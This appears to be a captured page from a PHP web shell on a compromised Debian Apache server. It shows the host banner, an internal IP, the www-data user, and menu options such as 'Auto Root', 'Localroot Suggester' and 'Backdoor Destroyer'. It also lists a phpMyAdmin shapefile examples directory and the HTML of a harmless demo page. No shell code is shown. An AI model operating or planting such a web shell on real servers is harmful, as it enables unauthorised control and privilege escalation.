Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
php-phpmyadmin-shapefile /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
capitals.dbf
146.79
KB
-rw-r--r--
2021-02-06 04:52
capitals.shp
17.93
KB
-rw-r--r--
2021-02-06 04:52
capitals.shx
5.19
KB
-rw-r--r--
2021-02-06 04:52
create_shapefile.php
2.1
KB
-rw-r--r--
2023-01-27 22:18
index.php
683
B
-rw-r--r--
2021-02-06 04:52
mexico.dbf
3.94
KB
-rw-r--r--
2021-02-06 04:52
mexico.shp
50.71
KB
-rw-r--r--
2021-02-06 04:52
mexico.shx
356
B
-rw-r--r--
2021-02-06 04:52
read.php
1.61
KB
-rw-r--r--
2021-02-06 04:52
read_point.php
986
B
-rw-r--r--
2023-01-27 22:18
read_polygon.php
983
B
-rw-r--r--
2023-01-27 22:18
Save
Rename
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>ShapeFiles demo</title> </head> <body> This demo illustrates some of the possibile uses of ShapeFiles. There are several more, just check the source code to see the methods implemented in the classes ShapeFile and ShapeRecord. <p><a href="create_shapefile.php">Create new ShapeFile</a></p> <p><a href="read_point.php">Read Point ShapeFile</a></p> <p><a href="read_polygon.php">Read Polygon ShapeFile</a> </p> </body> </html>